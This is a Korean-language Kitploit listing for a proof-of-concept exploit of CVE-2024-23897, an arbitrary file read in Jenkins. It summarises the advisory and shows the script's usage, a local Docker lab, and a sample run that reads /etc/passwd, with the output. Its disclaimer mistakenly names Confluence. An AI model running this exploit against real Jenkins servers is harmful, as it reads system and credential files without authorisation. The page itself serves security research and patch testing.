Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-23897 — 이 저장소는 CVE-2024-23897의 개념 증명(proof-of-concept)을 제시합니다. | Kitploit
도구/GitHubGitHub/vozec/cve-2024-23897
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubvozec/cve-2024-23897

CVE-2024-23897

이 저장소는 CVE-2024-23897의 개념 증명(proof-of-concept)을 제시합니다.

저장소 보기
1732년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-23897

이 저장소는 CVE-2024-23897에 대한 개념 증명(PoC)을 제공합니다. (SonarSource에 의해 발견됨)

CVE-2024-23897 | Jenkins 파일 읽기

면책 조항

이 코드는 취약점의 개념 증명입니다. 저는 누구도 소유하지 않은 컨플루언스 인스턴스에서 이를 사용하도록 권장하지 않습니다.
이 도구는 연구 및 교육 목적으로만 개발되었으며, 이 도구를 사용함으로써 발생하는 어떤 결과에 대해서도 책임을 지지 않습니다.

설명

Jenkins Security Advisory 2024-01-24 에 따르면: Jenkins는 CLI 명령을 처리할 때 Jenkins 컨트롤러에서 명령 인수와 옵션을 파싱하기 위해 args4j 라이브러리를 사용합니다. 이 명령 파서에는 인수의 @ 문자 뒤에 오는 파일 경로를 파일의 내용으로 대체하는 기능(expandAtFiles)이 있습니다. 이 기능은 기본적으로 활성화되어 있으며, Jenkins 2.441 및 이전 버전, LTS 2.426.2 및 이전 버전에서는 이를 비활성화하지 않습니다. 이로 인해 공격자는 Jenkins 컨트롤러 프로세스의 기본 문자 인코딩을 사용하여 Jenkins 컨트롤러 파일 시스템의 임의 파일을 읽을 수 있습니다.

  • Overall/Read 권한이 있는 공격자는 전체 파일을 읽을 수 있습니다.
  • Overall/Read 권한이 없는 공격자는 파일의 처음 몇 줄만 읽을 수 있습니다.

도움말

root@kitploit:~
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename

예제

root@kitploit:~
docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
root@kitploit:~
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

참고 자료:

  • https://www.jenkins.io/security/advisory/2024-01-24/
  • https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
  • https://twitter.com/zin_min_phyo/status/1750827780856816063
도구 다운로드